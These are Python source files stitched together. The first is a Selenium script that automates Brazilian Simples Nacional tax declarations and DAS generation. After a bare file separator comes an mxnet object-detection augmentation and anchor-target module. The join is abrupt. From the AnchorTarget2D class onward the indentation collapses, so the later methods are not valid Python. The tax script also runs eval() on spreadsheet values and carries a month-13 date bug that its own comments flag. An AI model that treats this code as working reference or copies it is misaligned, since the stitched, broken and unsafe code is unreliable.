    :param sheet_id: sheet index — 0: generic, 1: ISS, 2: ICMS.
    :param valor_declarado: revenue value to type ('' = no movement).
    :param my_new_3valores: per-client three-values data (falsy -> use
        the ``after_READ`` spreadsheet columns instead).
    :param cont_ret_n_ret: row index into ``after_READ`` columns.
    """
    driver = self.driver
    after_READ = self.after_READ
    declara_client = self.now_person
    try:
        # If the confirm dialog exists, ask the operator what to do.
        js_confirm = driver.find_element_by_id('jsMsgBoxConfirm')
        tk_msg('F2 para somente gerar os últimos 3 arquivos de declarações.\n F4 para RETIFICAR'
               '\nF10 p/ consolidar para ultima data do mês\n\n'
               '\nF11 Para passar para o próximo cliente \n\n'
               'Espere ou clique OK', 10)
        # Could not attach a callback to the message box, hence key polling.
        which_one = press_keys_b4('f2', 'f4', 'f10', 'f11')
        print(type(which_one))
        print(which_one)
        if which_one == 'f2':
            # Consult declarações / download the files.
            self.simples_and_ecac_utilities(2, compt)
        elif which_one == 'f4':
            print('RETIFICA!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
            driver.execute_script("""
            window.location.href = '/SimplesNacional/Aplicacoes/ATSPO/pgdasd2018.app/Pa/Retificar'""")
            # The raise deliberately falls through to the declaration flow
            # below, which performs the rectification.
            raise NoSuchElementException
        elif which_one == 'f10':
            self.simples_and_ecac_utilities(1, compt)
            # F10: consolidate to the last date of the month.
        elif which_one == 'f11':
            pass
    except NoSuchElementException:
        print('ALREADY FALSE')
        sleep(2.5)
        inp = driver.find_elements_by_tag_name('input')[0]
        sleep(3)
        print('R$', valor_declarado)
        # Re-find the first input and type the declared value into it.
        inp = driver.find_elements_by_tag_name('input')[0]
        inp.clear()
        inp.send_keys(valor_declarado)
        for i in range(2):
            inp.send_keys(Keys.TAB)
        self.find_submit_form()
        sleep(3)
        print(f'{valor_declarado}, olha o valor aqui')
        if sheet_id == 0 or valor_declarado == '':
            # Generic sheet, or "no movement": just submit twice.
            for i in range(2):
                self.tags_wait('form')
                sleep(3)
                try:
                    self.find_submit_form()
                except NoSuchElementException:
                    driver.find_elements_by_class_name('btn-success')[1].click()
                    # em teste
        # ISS, index 1
        elif sheet_id == 1:
            def trata_retencoes(v):
                # Normalize a retention value: anything that evaluates to
                # zero becomes '' (treated as "absent") downstream.
                try:
                    if float(eval(str(v).replace(',', '.'))) == 0:
                        v = ''
                except SyntaxError:
                    # return v
                    v = v
                finally:
                    return v
            if not my_new_3valores:
                """
                SemRetencao = self.trata_money_excel(after_READ['NÃO RETIDO'][cont_ret_n_ret])
                ComRetencao = self.trata_money_excel(after_READ['RETIDO'][cont_ret_n_ret])
                # padronizar essa parte
                """
                # Fall back to the spreadsheet columns.
                SemRetencao = self.trata_money_excel(after_READ['Sem Retenção'][cont_ret_n_ret])
                ComRetencao = self.trata_money_excel(after_READ['Com Retenção'][cont_ret_n_ret])
                # input('if not')
            else:
                SemRetencao = self.trata_money_excel([v for v in my_new_3valores[2].values()][0])
                ComRetencao = self.trata_money_excel([v for v in my_new_3valores[1].values()][0])
                # input('else')
            print('~~~~~~~~~~~~' * 30)
            print(f'ANTES, Com Retenção: {ComRetencao}, Sem:{SemRetencao}')
            ComRetencao = trata_retencoes(ComRetencao)
            SemRetencao = trata_retencoes(SemRetencao)
            print('~~~~~~~~~~~~' * 30)
            print(f'Com Retenção: {ComRetencao}, Sem:{SemRetencao}')
            # input('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa')
            print('~~~~~~~~~~~~' * 30)
            self.tags_wait('a')
            prestacao_serv = driver.find_element_by_id('btn-exibe-todos')
            prestacao_serv.click()
            sleep(2.5)
            # The three retention cases are navigated purely by TAB counts,
            # so the exact key order below is load-bearing.
            if SemRetencao != '' and ComRetencao == '':
                print('Só teve SEM RETENÇÃO')
                self.send_keys_anywhere(Keys.TAB, 17 + 1)
                self.send_keys_anywhere(Keys.ENTER)
                self.find_submit_form()  # submits retentions, no value yet
                sleep(2.5)
                self.send_keys_anywhere(valor_declarado)
                self.send_keys_anywhere(Keys.ENTER)  # submit the value
                sleep(2.5)
                self.send_keys_anywhere(Keys.ENTER)  # calculate
                sleep(3)
                self.find_submit_form()
                sleep(2)
            elif SemRetencao != '' and ComRetencao != '':
                print('Retido e não retido.')
                self.send_keys_anywhere(Keys.TAB, 17 + 1)
                self.send_keys_anywhere(Keys.ENTER)
                self.send_keys_anywhere(Keys.TAB, 1)
                self.send_keys_anywhere(Keys.ENTER)
                self.find_submit_form()  # submits retentions, no value yet
                sleep(2)
                self.send_keys_anywhere(SemRetencao)
                self.send_keys_anywhere(Keys.TAB, 9)
                self.send_keys_anywhere(ComRetencao)
                self.send_keys_anywhere(Keys.ENTER)  # calculate
                sleep(3)
                self.find_submit_form()
                sleep(2)
            elif SemRetencao == '' and ComRetencao != '':
                print('\033[1;33mSó teve COM RETENÇÃO\033[m')
                self.send_keys_anywhere(Keys.TAB, 17 + 2)
                # +2 selects the WITH-retention option
                self.send_keys_anywhere(Keys.ENTER)
                self.find_submit_form()  # submits retentions, no value yet
                sleep(2.5)
                self.send_keys_anywhere(valor_declarado)
                self.send_keys_anywhere(Keys.ENTER)  # submit the value
                sleep(2.5)
                self.send_keys_anywhere(Keys.ENTER)  # calculate
                sleep(3)
                self.find_submit_form()
                sleep(2)
            # The value was already normalized in the master IF above.
            if valor_declarado != '':
                sleep(.5)
                driver.find_elements_by_class_name('btn-success')[1].click()
                # self.GERA_PGDAS2 equivalent: generate the PGDAS files
                sleep(3.5)
                driver.implicitly_wait(5)
                try:
                    self.find_submit_form()
                except NoSuchElementException:
                    driver.find_elements_by_class_name('btn-success')[1].click()
                # Download happens automatically (driver profile settings).
        elif sheet_id == 2:
            # ICMS: choose between sale ("venda") and resale ("revenda").
            cont_vrv = cont_ret_n_ret
            VRV = after_READ['Venda ou Revenda'][cont_vrv]
            print(f'Venda ou revenda: {VRV}')
            vrv = VRV.lower().strip()
            self.tags_wait('a')
            prestacao_serv = driver.find_element_by_id('btn-exibe-todos')
            prestacao_serv.click()
            sleep(2.5)
            if vrv == 'revenda':
                self.send_keys_anywhere(Keys.TAB, 3)
                self.send_keys_anywhere(Keys.ENTER)
            elif vrv == 'venda':
                self.send_keys_anywhere(Keys.TAB, 7)
                self.send_keys_anywhere(Keys.ENTER)
            # The value was already normalized in the master IF above.
            if valor_declarado != '':
                sleep(2)
                self.find_submit_form()
                self.tags_wait('body', 'input', 'form')
                sleep(1.5)
                self.send_keys_anywhere(valor_declarado)
                sleep(1.5)
                self.send_keys_anywhere(Keys.ENTER)  # calculate
                sleep(2.5)
                self.tags_wait('body', 'input', 'form')
                self.send_keys_anywhere(Keys.ENTER)  # transmit
                sleep(2)
                self.find_submit_form()
                sleep(.5)
                driver.find_elements_by_class_name('btn-success')[1].click()
                sleep(2.5)
                self.find_submit_form()
                # generated
        # ~~~~~~~~~~~~~ universal tail (all sheet kinds) ~~~~~~~~~~~~~ #
        print('AFTER IFs')
        # Record proof: screenshot named per client, flagging no-movement.
        add = '-SemMovimento' if valor_declarado == '' else ''
        save = self.certif_feito(self.client_path, add=add)
        driver.save_screenshot(save)
        self.simples_and_ecac_utilities(2, compt)
        # Generates everyone's receipts/protocols.
        # ######################################################
        # print('Esperando pressionar DOWN no excel...')
        # press_key_b4('down')
def simples_and_ecac_utilities(self, option, compt):
    """
    :param int option: 1 or 2 only:
        1 -> generate the DAS, consolidating it to another due date
        2 -> download the declaração protocols/receipts
    :param str compt: competência ('MM-YYYY' or similar; digits are kept)
    :return: None
    """
    # We are on the "declaração" page here, free to navigate around it.
    from datetime import datetime
    now_year = str(datetime.now().year)
    compt = ''.join(v for v in compt if v.isdigit())
    month_compt = compt[:2]
    year_compt = compt[2:]
    driver = self.driver
    current_url = self.current_url
    link_gera_das, download_protocolos_das = 'Das/PorPa', '/Consulta'
    if option == 2:
        # Consultation page listing the competências already declared.
        self.get_sub_site(download_protocolos_das, current_url)
        driver.implicitly_wait(5)
        if now_year != year_compt:
            # Past year: filter the listing by the target year first.
            self.send_keys_anywhere(year_compt)
            self.find_submit_form()
            sleep(3.5)
        # Click the last (most recent) competência entry.
        comp_clic = driver.find_elements_by_class_name('pa')
        lenc = len(comp_clic) - 1
        comp_clic[lenc].click()
        # Download the three files via keyboard navigation.
        for i in range(3):
            sleep(2)
            self.send_keys_anywhere(Keys.TAB)
            self.send_keys_anywhere(Keys.ENTER)
    elif option == 1:
        # Generate the DAS consolidated to the next month's last business day.
        # NOTE(review): for December this yields month 13 — confirm
        # get_last_business_day_of_month / the date string handle rollover.
        venc_month_compt = int(month_compt) + 1
        venc = self.get_last_business_day_of_month(venc_month_compt, int(year_compt))
        retifica_p_dia = f'{venc}{venc_month_compt:02d}{year_compt}'
        self.get_sub_site(link_gera_das, current_url)
        self.tags_wait('input')
        driver.implicitly_wait(10)
        periodo = driver.find_element_by_id('pa')
        periodo.send_keys(compt)
        self.find_submit_form()
        sleep(2.5)
        # if len(driver.find_elements_by_id('msgBox')) == 0  # when the DAS does not exist
        consolida = driver.find_element_by_id('btnConsolidarOutraData')
        consolida.click()
        sleep(2.5)
        validade_id = 'txtDataValidade'
        driver.execute_script(f"document.getElementById('{validade_id}').focus();")
        validade_change = driver.find_element_by_id(validade_id)
        # Type the date digit by digit; the first keystroke needs a beat
        # for the masked input to register.
        for e, val in enumerate(retifica_p_dia):
            validade_change.send_keys(val)
            if e == 0:
                sleep(.25)
        sleep(1)
        driver.find_element_by_id('btnDataValidade').click()
        # Due date set; now generate the DAS itself.
        driver.implicitly_wait(5)
        self.find_submit_form()
    else:
        tk_msg(f'Tente outra opção, linha 550 +-, opc: {option}')
def opta_script(self):
    """Opt the client into the "Regime de Apuração" (competência regime).

    Best-effort: if any element is missing the whole step is skipped,
    and in every case the driver is sent back to the declaração page.
    """
    driver = self.driver
    try:
        # #################################################### opta
        self.get_sub_site('/RegimeApuracao/Optar', self.current_url)
        # driver.execute_script("""window.location.href += '/RegimeApuracao/Optar'""")
        from selenium.webdriver.support.ui import Select
        # NOTE(review): calendar year is hard-coded — needs updating
        # yearly (or deriving from the current date).
        anocalendario = Select(driver.find_element_by_id('anocalendario'))
        anocalendario.select_by_value('2021')
        self.find_submit_form()
        # Radio values: '0' selects competência, '1' selects caixa.
        competencia, caixa = '0', '1'
        driver.find_element_by_css_selector(f"input[type='radio'][value='{competencia}']").click()
        self.find_submit_form()
        sleep(2.5)
        # driver.find_element_by_id('btnSimConfirm').click()
        try:
            driver.implicitly_wait(10)
            # Save/download the opt-in confirmation.
            self.click_ac_elementors(driver.find_element_by_class_name('glyphicon-save'))
        except NoSuchElementException:
            input('Não consegui')
        else:
            print('Não fui exceptado')
        # ########################################################
    except NoSuchElementException:
        pass
    finally:
        driver.get(self.current_url)
        driver.execute_script("""window.location.href += '/declaracao?clear=1'""")
        sleep(2.5)
|
detection_input.py | from __future__ import division
from __future__ import print_function
import cv2
import numpy as np
import mxnet as mx
from queue import Queue
from threading import Thread
from operator_py.cython.bbox import bbox_overlaps_cython
from operator_py.bbox_transform import nonlinear_transform as bbox_transform
class DetectionAugmentation(object):
    """Base class for detection-pipeline transforms.

    Subclasses override ``apply`` and mutate ``input_record`` in place.
    """
    def __init__(self):
        pass

    def apply(self, input_record):
        # Intentionally a no-op; subclasses transform the record in place.
        pass
class ReadRoiRecord(DetectionAugmentation):
    """
    input: image_url, str
           gt_url, str
    output: image, ndarray(h, w, rgb)
            image_raw_meta, tuple(h, w)
            gt, any
    """

    def __init__(self, gt_select):
        super().__init__()
        self.gt_select = gt_select

    def apply(self, input_record):
        # Decode as BGR, then flip the channel axis to obtain RGB floats.
        bgr = cv2.imread(input_record["image_url"], cv2.IMREAD_COLOR)
        input_record["image"] = bgr[:, :, ::-1].astype("float32")
        # TODO: remove this compatibility method
        # Append the class id as a fifth column of gt_bbox.
        class_column = input_record["gt_class"].reshape(-1, 1)
        input_record["gt_bbox"] = np.concatenate(
            [input_record["gt_bbox"], class_column], axis=1)
        # gt_dict = pkl.load(input_record["gt_url"])
        # for s in self.gt_select:
        #     input_record[s] = gt_dict[s]
class GroupRead(DetectionAugmentation):
    """
    input: dataset version, int
    output: rpn_group
            box_group
    """

    def __init__(self, pGroup):
        super().__init__()
        self.p = pGroup

    def apply(self, input_record):
        version = input_record["version"]
        groups = self.p
        # Hand each record its own copy so downstream mutation is safe.
        input_record["rpn_group"] = groups.rpn_groups[version].copy()
        input_record["box_group"] = groups.box_groups[version].copy()
class Norm2DImage(DetectionAugmentation):
    """
    input: image, ndarray(h, w, rgb)
    output: image, ndarray(h, w, rgb)
    """

    def __init__(self, pNorm):
        super().__init__()
        self.p = pNorm  # type: NormParam

    def apply(self, input_record):
        params = self.p
        # Standardize in float32: subtract the mean, divide by the std.
        normalized = input_record["image"].astype(np.float32)
        normalized -= params.mean
        normalized /= params.std
        input_record["image"] = normalized
class Resize2DImageBbox(DetectionAugmentation):
    """
    input: image, ndarray(h, w, rgb)
           gt_bbox, ndarry(n, 5)
    output: image, ndarray(h', w', rgb)
            im_info, tuple(h', w', scale)
            gt_bbox, ndarray(n, 5)
    """

    def __init__(self, pResize):
        super().__init__()
        self.p = pResize  # type: ResizeParam

    def apply(self, input_record):
        p = self.p
        image = input_record["image"]
        boxes = input_record["gt_bbox"].astype(np.float32)
        h, w = image.shape[:2]
        # Scale so the short side reaches p.short unless the long side
        # would exceed p.long.
        shorter, longer = min(h, w), max(h, w)
        scale = min(p.short / shorter, p.long / longer)
        input_record["image"] = cv2.resize(
            image, None, None, scale, scale, interpolation=cv2.INTER_LINEAR)
        # Scale the boxes with the image, then clamp them inside the
        # resized extent so no box overflows.
        boxes[:, :4] = boxes[:, :4] * scale
        if h < w:
            x_max, y_max = p.long, p.short
        else:
            x_max, y_max = p.short, p.long
        boxes[:, [0, 2]] = np.clip(boxes[:, [0, 2]], 0, x_max)
        boxes[:, [1, 3]] = np.clip(boxes[:, [1, 3]], 0, y_max)
        input_record["gt_bbox"] = boxes
        # exactly as opencv
        input_record["im_info"] = np.array(
            [round(h * scale), round(w * scale), scale], dtype=np.float32)
class Resize2DImage(DetectionAugmentation):
    """
    input: image, ndarray(h, w, rgb)
    output: image, ndarray(h', w', rgb)
            im_info, tuple(h', w', scale)
    """

    def __init__(self, pResize):
        super().__init__()
        self.p = pResize  # type: ResizeParam

    def apply(self, input_record):
        p = self.p
        image = input_record["image"]
        h, w = image.shape[:2]
        # Scale so the short side reaches p.short unless the long side
        # would exceed p.long.
        shorter, longer = min(h, w), max(h, w)
        scale = min(p.short / shorter, p.long / longer)
        input_record["image"] = cv2.resize(
            image, None, None, scale, scale, interpolation=cv2.INTER_LINEAR)
        # exactly as opencv
        input_record["im_info"] = np.array(
            [round(h * scale), round(w * scale), scale], dtype=np.float32)
class Resize2DImageByRoidb(DetectionAugmentation):
    """Resize an image using per-record target sizes from the roidb.

    input: image, ndarray(h, w, rgb)
           resize_long / resize_short, per-record ints
    output: image, ndarray(h', w', rgb)
            im_info, tuple(h', w', scale)
    """

    def __init__(self):
        super().__init__()

        class ResizeParam:
            long = None
            short = None

        self.resize_aug = Resize2DImage(ResizeParam)

    def apply(self, input_record):
        # Copy the per-record target sizes onto the shared param holder,
        # then delegate to the plain resize transform.
        params = self.resize_aug.p
        params.long = input_record["resize_long"]
        params.short = input_record["resize_short"]
        self.resize_aug.apply(input_record)
class RandResize2DImageBbox(DetectionAugmentation):
    """
    input: image, ndarray(h, w, rgb)
           gt_bbox, ndarry(n, 4)
    output: image, ndarray(h', w', rgb)
            im_info, tuple(h', w', scale)
            gt_bbox, ndarray(n, 4)
    """

    def __init__(self, pRandResize):
        super().__init__()
        self.p = pRandResize

        class ResizeParam:
            long = None
            short = None

        self.resize_aug = Resize2DImageBbox(ResizeParam)

    def apply(self, input_record):
        # Draw one of the configured (long, short) size pairs at random,
        # then delegate to the deterministic resize transform.
        pick = np.random.randint(len(self.p.long_ranges))
        self.resize_aug.p.long = self.p.long_ranges[pick]
        self.resize_aug.p.short = self.p.short_ranges[pick]
        self.resize_aug.apply(input_record)
class Flip2DImageBbox(DetectionAugmentation):
    """
    input: image, ndarray(h, w, rgb)
           gt_bbox, ndarry(n, 4)
    output: image, ndarray(h, w, rgb)
            gt_bbox, ndarray(n, 4)
    """

    def __init__(self):
        super().__init__()

    def apply(self, input_record):
        if not input_record["flipped"]:
            return
        image = input_record["image"]
        boxes = input_record["gt_bbox"]
        input_record["image"] = image[:, ::-1]
        # Mirror x-coordinates; x1 and x2 swap roles to stay ordered.
        mirrored = boxes.copy()
        width = image.shape[1]
        mirrored[:, 0] = (width - 1) - boxes[:, 2]
        mirrored[:, 2] = (width - 1) - boxes[:, 0]
        input_record["gt_bbox"] = mirrored
class RandCrop2DImageBbox(DetectionAugmentation):
    """Crop a (long x short) window from the image and remap gt boxes.

    ``mode == "center"``: center the window on a randomly chosen gt box
    (with jitter), shifting it back inside the image if it crosses a
    border.  ``mode == "random"``: uniform random window position.
    Boxes whose center falls outside the window are dropped; survivors
    are translated and clipped to the window.
    """
    def __init__(self, pCrop):
        super().__init__()
        self.p = pCrop
        assert pCrop.mode in ["center", "random"], "The {} crop mode is not supported".format(pCrop.mode)

    def apply(self, input_record):
        p = self.p
        image = input_record["image"]
        gt_bbox = input_record["gt_bbox"]
        # Orient the crop window like the image (portrait vs landscape),
        # and never larger than the image itself.
        if image.shape[0] >= image.shape[1]:
            crop_w, crop_h = p.short, p.long
        else:
            crop_w, crop_h = p.long, p.short
        crop_w = min(crop_w, image.shape[1])
        crop_h = min(crop_h, image.shape[0])
        if p.mode == "center" and gt_bbox.shape[0] > 0:
            # Randomly select a box as the cropping center.
            rand_index = np.random.randint(gt_bbox.shape[0])
            box = gt_bbox[rand_index, :]
            # Decide the start point: box center plus jitter.
            ctr_x = (box[2] + box[0]) / 2.0
            ctr_y = (box[3] + box[1]) / 2.0
            noise_h = np.random.randint(-10, 10)
            noise_w = np.random.randint(-30, 30)
            start_h = int(round(ctr_y - crop_h / 2)) + noise_h
            start_w = int(round(ctr_x - crop_w / 2)) + noise_w
            end_h = start_h + crop_h
            end_w = start_w + crop_w
            # Shift the window back inside the image if it crosses a border
            # (window size is preserved by moving both edges together).
            if start_h < 0:
                off = -start_h
                start_h += off
                end_h += off
            if start_w < 0:
                off = -start_w
                start_w += off
                end_w += off
            if end_h > image.shape[0]:
                off = end_h - image.shape[0]
                end_h -= off
                start_h -= off
            if end_w > image.shape[1]:
                off = end_w - image.shape[1]
                end_w -= off
                start_w -= off
        else:
            # Uniform random crop position within the image.
            start_h = np.random.randint(0, image.shape[0] - crop_h + 1)
            start_w = np.random.randint(0, image.shape[1] - crop_w + 1)
            end_h = start_h + crop_h
            end_w = start_w + crop_w
        assert start_h >= 0 and start_w >= 0 and end_h <= image.shape[0] and end_w <= image.shape[1]
        # Crop; any resizing happens in a later transform.
        im_cropped = image[start_h:end_h, start_w:end_w, :]
        # Keep only boxes whose center lies strictly inside the window,
        # then translate and clip them to window coordinates.
        ctrs_x = (gt_bbox[:, 2] + gt_bbox[:, 0]) / 2.0
        ctrs_y = (gt_bbox[:, 3] + gt_bbox[:, 1]) / 2.0
        keep = np.where((ctrs_y > start_h) & (ctrs_x > start_w) & (ctrs_y < end_h) & (ctrs_x < end_w))
        gt_bbox = gt_bbox[keep]
        gt_bbox[:, [0, 2]] -= start_w
        gt_bbox[:, [1, 3]] -= start_h
        gt_bbox[:, [0, 2]] = np.clip(gt_bbox[:, [0, 2]], 0, crop_w - 1)
        gt_bbox[:, [1, 3]] = np.clip(gt_bbox[:, [1, 3]], 0, crop_h - 1)
        input_record["image"] = im_cropped
        input_record["gt_bbox"] = gt_bbox
        input_record["im_info"] = np.array([crop_h, crop_w, input_record["im_info"][2]], dtype=np.float32)
class Pad2DImageBbox(DetectionAugmentation):
    """
    input: image, ndarray(h, w, rgb)
           gt_bbox, ndarry(n, 5)
    output: image, ndarray(h, w, rgb)
            gt_bbox, ndarray(max_num_gt, 5)
    """

    def __init__(self, pPad):
        super().__init__()
        self.p = pPad  # type: PadParam

    def apply(self, input_record):
        p = self.p
        image = input_record["image"]
        boxes = input_record["gt_bbox"]
        h, w = image.shape[:2]
        # Portrait pads to (long, short); landscape to (short, long).
        target = (p.long, p.short, 3) if h >= w else (p.short, p.long, 3)
        canvas = np.zeros(target, dtype=np.float32)
        canvas[:h, :w] = image
        input_record["image"] = canvas
        # Pad the box list to a fixed length with -1 sentinel rows.
        box_canvas = np.full((p.max_num_gt, 5), -1, dtype=np.float32)
        box_canvas[:len(boxes)] = boxes
        input_record["gt_bbox"] = box_canvas
class Pad2DImage(DetectionAugmentation):
    """
    input: image, ndarray(h, w, rgb)
    output: image, ndarray(h, w, rgb), zero-padded to the fixed shape
    """

    def __init__(self, pPad):
        super().__init__()
        self.p = pPad  # type: PadParam

    def apply(self, input_record):
        p = self.p
        image = input_record["image"]
        h, w = image.shape[:2]
        # Portrait pads to (long, short); landscape to (short, long).
        target = (p.long, p.short, 3) if h >= w else (p.short, p.long, 3)
        canvas = np.zeros(target, dtype=np.float32)
        canvas[:h, :w] = image
        input_record["image"] = canvas
class ConvertImageFromHwcToChw(DetectionAugmentation):
    """Transpose the image from HWC to CHW layout (framework order)."""

    def __init__(self):
        super().__init__()

    def apply(self, input_record):
        hwc = input_record["image"]
        input_record["image"] = hwc.transpose((2, 0, 1))
class AnchorTarget2D(DetectionAugmentation):
"""
input: image_meta: tuple(h, w, scale)
gt_bbox, ndarry(max_num_gt, 5)
output: anchor_label, ndarray(num_anchor * 2, h, w)
anchor_bbox_target, ndarray(num_anchor * 4, h, w)
anchor_bbox_weight, ndarray(num_anchor * 4, h, w)
"""
def __init__(self, pAnchor):
    """:param pAnchor: anchor config, read via ``p.generate.{stride, scales, aspects, short, long}``."""
    super().__init__()
    self.p = pAnchor  # type: AnchorTarget2DParam
    # Lazily-built caches, filled by the corresponding properties below.
    self.__base_anchor = None
    self.__v_all_anchor = None
    self.__h_all_anchor = None
    self.__num_anchor = None
    self.DEBUG = False
@property
def base_anchor(self):
    """Anchors of every aspect/scale, centered on one stride cell; cached."""
    if self.__base_anchor is None:
        gen = self.p.generate
        # Reference cell: one stride-sized square at the origin.
        ref = np.array([0, 0, gen.stride - 1, gen.stride - 1])
        ref_w = ref[2] - ref[0] + 1
        ref_h = ref[3] - ref[1] + 1
        cx = ref[0] + 0.5 * (ref_w - 1)
        cy = ref[1] + 0.5 * (ref_h - 1)
        # Widths/heights per aspect ratio (area-preserving), then per scale.
        w_ratios = np.round(np.sqrt(ref_w * ref_h / gen.aspects))
        h_ratios = np.round(w_ratios * gen.aspects)
        widths = np.outer(w_ratios, gen.scales).reshape(-1)
        heights = np.outer(h_ratios, gen.scales).reshape(-1)
        self.__base_anchor = np.stack(
            [cx - 0.5 * (widths - 1),
             cy - 0.5 * (heights - 1),
             cx + 0.5 * (widths - 1),
             cy + 0.5 * (heights - 1)],
            axis=1)
    return self.__base_anchor
@property
def v_all_anchor(self):
    """All anchors for a portrait (short x long) feature grid; cached."""
    if self.__v_all_anchor is None:
        gen = self.p.generate
        xs = np.arange(0, gen.short, dtype=np.float32) * gen.stride
        ys = np.arange(0, gen.long, dtype=np.float32) * gen.stride
        grid_x, grid_y = np.meshgrid(xs, ys)
        grid_x, grid_y = grid_x.reshape(-1), grid_y.reshape(-1)
        # One (x, y, x, y) shift per grid cell, broadcast over base anchors.
        shifts = np.stack([grid_x, grid_y, grid_x, grid_y], axis=1)
        anchors = (shifts[:, None, :] + self.base_anchor[None, :, :]).reshape(-1, 4)
        self.__v_all_anchor = anchors
        self.__num_anchor = anchors.shape[0]
    return self.__v_all_anchor
@property
def h_all_anchor(self):
    """All anchors for a landscape (long x short) feature grid; cached."""
    if self.__h_all_anchor is None:
        gen = self.p.generate
        xs = np.arange(0, gen.long, dtype=np.float32) * gen.stride
        ys = np.arange(0, gen.short, dtype=np.float32) * gen.stride
        grid_x, grid_y = np.meshgrid(xs, ys)
        grid_x, grid_y = grid_x.reshape(-1), grid_y.reshape(-1)
        # One (x, y, x, y) shift per grid cell, broadcast over base anchors.
        shifts = np.stack([grid_x, grid_y, grid_x, grid_y], axis=1)
        anchors = (shifts[:, None, :] + self.base_anchor[None, :, :]).reshape(-1, 4)
        self.__h_all_anchor = anchors
        self.__num_anchor = anchors.shape[0]
    return self.__h_all_anchor
@v_all_anchor.setter
def v_all_anchor(self, value):
    # Replacing the cached anchors also refreshes the anchor count.
    self.__v_all_anchor = value
    self.__num_anchor = value.shape[0]
@h_all_anchor.setter
def h_all_anchor(self, value):
    # Replacing the cached anchors also refreshes the anchor count.
    self.__h_all_anchor = value
    self.__num_anchor = value.shape[0]
def _assign_label_to_anchor(self, valid_anchor, gt_bbox, neg_thr, pos_thr, min_pos_thr):
    """Label each anchor fg(1) / bg(0) / ignore(-1) by IoU against gt boxes.

    :param valid_anchor: (num_anchor, 4) anchors inside the image
    :param gt_bbox: (num_gt, 4) ground-truth boxes (may be empty)
    :param neg_thr: max-IoU below this -> background
    :param pos_thr: max-IoU at or above this -> foreground
    :param min_pos_thr: minimum IoU for the per-gt best-anchor rule
    :return: (cls_label, argmax_overlaps) where argmax_overlaps maps each
        anchor to the index of its best-overlapping gt (used for regression)
    """
    num_anchor = valid_anchor.shape[0]
    # start with everything ignored (-1)
    cls_label = np.full(shape=(num_anchor,), fill_value=-1, dtype=np.float32)
    if len(gt_bbox) > 0:
        # num_anchor x num_gt
        overlaps = bbox_overlaps_cython(valid_anchor.astype(np.float32, copy=False), gt_bbox.astype(np.float32, copy=False))
        max_overlaps = overlaps.max(axis=1)
        argmax_overlaps = overlaps.argmax(axis=1)
        gt_max_overlaps = overlaps.max(axis=0)
        # TODO: speed up this
        # TODO: fix potentially assigning wrong anchors as positive
        # A correct implementation is given as
        # gt_argmax_overlaps = np.where((overlaps.transpose() == gt_max_overlaps[:, None]) &
        #                               (overlaps.transpose() >= min_pos_thr))[1]
        gt_argmax_overlaps = np.where((overlaps == gt_max_overlaps) &
                                      (overlaps >= min_pos_thr))[0]
        # anchor class: assignment ORDER matters — bg first, then the
        # per-gt-best and above-threshold rules override it
        cls_label[max_overlaps < neg_thr] = 0
        # fg label: for each gt, anchor with highest overlap
        cls_label[gt_argmax_overlaps] = 1
        # fg label: above threshold IoU
        cls_label[max_overlaps >= pos_thr] = 1
    else:
        # no ground truth: everything is background
        cls_label[:] = 0
        argmax_overlaps = np.zeros(shape=(num_anchor, ))
    return cls_label, argmax_overlaps
def _assign_label_to_anchor_group(self, valid_anchor, gt_bbox, gt_class, neg_thr, pos_thr, min_pos_thr):
    """Group-softmax variant of anchor labeling: positives carry the class
    id of their matched gt instead of a plain 1.

    :param gt_class: (num_gt,) class/group id per gt box
    :return: (cls_label, argmax_overlaps) — cls_label holds -1/0 or the
        matched gt's class id; argmax_overlaps maps each anchor to its
        best-overlapping gt index
    """
    num_anchor = valid_anchor.shape[0]
    cls_label = np.full(shape=(num_anchor,), fill_value=-1, dtype=np.float32)
    if len(gt_bbox) > 0:
        # num_anchor x num_gt
        overlaps = bbox_overlaps_cython(valid_anchor.astype(np.float32, copy=False), gt_bbox.astype(np.float32, copy=False))
        max_overlaps = overlaps.max(axis=1)
        argmax_overlaps = overlaps.argmax(axis=1)
        gt_max_overlaps = overlaps.max(axis=0)
        # (num_anchor, num_gt) table repeating the gt class ids per anchor
        mask_label_map = np.tile(gt_class.reshape(-1).astype(np.float32), num_anchor).reshape(num_anchor, -1)
        # class id of each anchor's best-overlapping gt
        max_overlaps_label = mask_label_map[np.arange(num_anchor), argmax_overlaps]
        gt_argmax_overlaps = np.where((overlaps == gt_max_overlaps) & (overlaps >= min_pos_thr))
        # anchor class: bg first, then per-gt-best and above-threshold override
        cls_label[max_overlaps < neg_thr] = 0
        # fg label: for each gt, anchor with highest overlap
        cls_label[gt_argmax_overlaps[0]] = mask_label_map[gt_argmax_overlaps]
        # fg label: above threshold IoU
        fg_label_idxs = np.where(max_overlaps >= pos_thr)[0]
        cls_label[fg_label_idxs] = max_overlaps_label[fg_label_idxs]
    else:
        # no ground truth: everything is background
        cls_label[:] = 0
        argmax_overlaps = np.zeros(shape=(num_anchor, ))
    return cls_label, argmax_overlaps
def _sample_anchor(self, label, num, fg_fraction):
num_fg = int(fg_fraction * num)
fg_inds = np.where(label >= 1)[0]
if len(fg_inds) > num_fg:
disable_inds = np.random.choice(fg_inds, size=(len(fg_inds) - num_fg), replace=False)
if self.DEBUG:
disable_inds = fg_inds[:(len(fg_inds) - num_fg)]
label[disable_inds] = -1
num_bg = num - np.sum(label >= 1)
bg_inds = np.where(label == 0)[0]
if len(bg_inds) > num_bg:
disable_inds = np.random.choice(bg_inds, size=(len(bg_inds) - num_bg), replace=False)
if self.DEBUG:
disable_inds = bg_inds[:(len(bg_inds) - num_bg)]
label[disable_inds] = -1
def _cal_anchor_target(self, label, valid_anchor, gt_bbox, anchor_label):
num_anchor = valid_anchor.shape[0]
reg_target = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
reg_weight = np.zeros(shape=(num_anchor, 4), dtype=np.float32)
fg_index = np.where(label >= 1)[0]
if len(fg_index) > 0:
reg_target[fg_index] = bbox_transform(valid_anchor[fg_index], gt_bbox[anchor_label[fg_index], :4])
reg_weight[fg_index, :] = 1.0
return reg_target, reg_weight
def _gather_valid_anchor(self, image_info):
h, w = image_info[:2]
all_anchor = self.v_all_anchor if h >= w else self.h_all_anchor
allowed_border = self.p.assign.allowed_border
valid_index = np.where((all_anchor[:, 0] >= -allowed_border) &
(all_anchor[:, 1] >= -allowed_border) &
(all_anchor[:, 2] < w + allowed_border) &
(all_anchor[:, 3] < h + allowed_border))[0]
